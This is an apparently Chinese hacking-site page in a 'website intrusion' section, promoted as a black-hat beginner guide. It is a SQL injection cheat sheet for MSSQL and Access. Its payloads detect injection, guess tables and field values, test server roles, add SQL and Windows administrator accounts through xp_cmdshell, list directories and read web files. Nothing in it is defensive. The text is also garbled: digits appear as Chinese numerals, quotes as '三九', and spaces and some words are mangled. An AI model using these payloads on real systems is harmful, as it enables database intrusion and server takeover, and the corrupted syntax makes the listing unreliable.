当前位置：首页 > 网站入侵 > 正文内容

黑客大户的联系方式-黑帽黑客入门(如何成为黑客基础入门

访客4年前 (2020-11-29)网站入侵940

一.断定是可有注进
;and 一= 一
;and 一= 二

二.始步断定是不是mssql
;anduser>0

三.注进参数是字符
三九;and[查询前提 ]and 三九; 三九;= 三九;

四.搜刮时出过滤参数的
三九;and[查询前提 ]and 三九;% 二五三九;= 三九;

五.断定数据库体系
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)fro妹妹sysobjects)>0access

六.猜数据库
;and(SelectCount(*)from[数据库名])>0

七.猜字段
;and(SelectCount(字段名)from数据库名)>0

八.猜字段外记载少度
;and(selecttop 一len(字段名)from数据库名)>0

九.( 一)猜字段的ascii值（access）
;and(selecttop 一asc(mid(字段名, 一, 一))from数据库名)>0

( 二)猜字段的ascii值（mssql）
;and(selecttop 一unicode(substring(字段名, 一, 一))from数据库名)>0

一0.测试权限构造（mssql）
;and 一=(SelectIS_SRVROLEMEMBER( 三九;sysadmin 三九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三九;serveradmin 三九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三九;setupadmin 三九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三九;securityadmin 三九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三九;diskadmin 三九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三九;bulkadmin 三九;));--
;and 一=(SelectIS_MEMBER( 三九;db_owner 三九;));--

一一.加添mssql战体系的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell 三九;netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add 三九;;--
;execmaster.dbo.xp_cmdshell 三九;netuserusernamepassword/add 三九;;--
;execmaster.dbo.xp_cmdshell 三九;netlocalgroupadministratorsusername/add 三九;;--

一二.( 一)遍历目次
;createtabledirs(pathsvarchar( 一00),idint)
;insertdirsexecmaster.dbo.xp_dirtree 三九;c:\ 三九;
;and(selecttop 一pathsfromdirs)>0
;and(selecttop 一pathsfromdirswherepathsnotin( 三九;上步获得的paths 三九;))>)

( 二)遍历目次
;createtabletemp(idnvarchar( 二五五),num 一nvarchar( 二五五),num 二nvarchar( 二五五),num 三nvarchar( 二五五));--
;inserttempexecmaster.dbo.xp_availablemedia;--得到当前任何驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs 三九;c:\ 三九;;--得到子目次列表
;insertintotemp(id,num 一)execmaster.dbo.xp_dirtree 三九;c:\ 三九;;--得到任何子目次的目次树构造
;insertintotemp(id)execmaster.dbo.xp_cmdshell 三九;typec:\web\index.asp 三九;;--审查文献的内容